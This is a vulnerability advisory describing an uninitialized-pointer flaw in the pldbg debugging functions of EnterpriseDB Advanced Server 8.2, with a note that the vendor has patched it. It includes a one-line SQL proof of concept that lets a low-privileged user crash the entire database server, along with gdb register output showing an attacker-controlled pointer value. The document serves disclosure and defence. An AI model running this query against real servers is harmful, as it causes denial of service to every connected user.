EnterpriseDB is a (comercial) relational database management system based on PostgreSQL.
EnterpriseDB Advanced Server 8.2 in all supported operative systems.
Tested Operative Systems:
Microsoft Windows 2003 SP2 x86 Red hat Enterprise Linux 4 x86
A problem was found in the product EnterpriseDB which may lead to remote code execution altought that point wasn't demostrated. At least, it is a denial of service.
The issue exists in, almost, all the debugging functions (so is a post-authentication vulnerability), i.e., pldbg_get_stack. The function "pldbg_create_listener" is the responsible of starting the debug process and must be the first function called before the client sends any debugging command.
The problem is that, when you call any debugging related function before the call to the main "pldbg_create_listener" an unitialized pointer is used causing a DOS (denial of service) that leads to remote code execution.
Proof of concept:
1) Connect to one vulnerable EnterpriseDB as a low level user (the execution privilege over the pldbg_* function is granted by default). 2) Execute the following query:
edb=> select pldbg_abort_target(1094861636); -- 0x41424344 in decimal
(gdb) x /i $pc 0xba81db <sendBytes+11>: mov (%eax),%eax (gdb) i r eax 0x41424344 1094861636 ecx 0x4 4 edx 0xbff46c04 -1074500604 ebx 0xbacbd8 12241880 esp 0xbff46bc0 0xbff46bc0 ebp 0xbff46be8 0xbff46be8 esi 0x4 4 edi 0xbab597 12236183 eip 0xba81db 0xba81db eflags 0x10286 66182 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0
The complete database server (droping all active conections) crashes.
The issue was fixed by no longer exposing a direct pointer to the client application; instead, the server sends an opaque handle to the client and them validate each handle when it comes back to the debugger - if the debugger detects an invalid handle, it throws an error.
The patch is available for customers in the EnterpriseDB website.
Thanks to Shahzad Khokhar, Vice President of Customer Support at EnterpriseDB Corporation. He were very kind and professional.
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
Joxean Koret - joxeankoret[at]yahoo[dot]es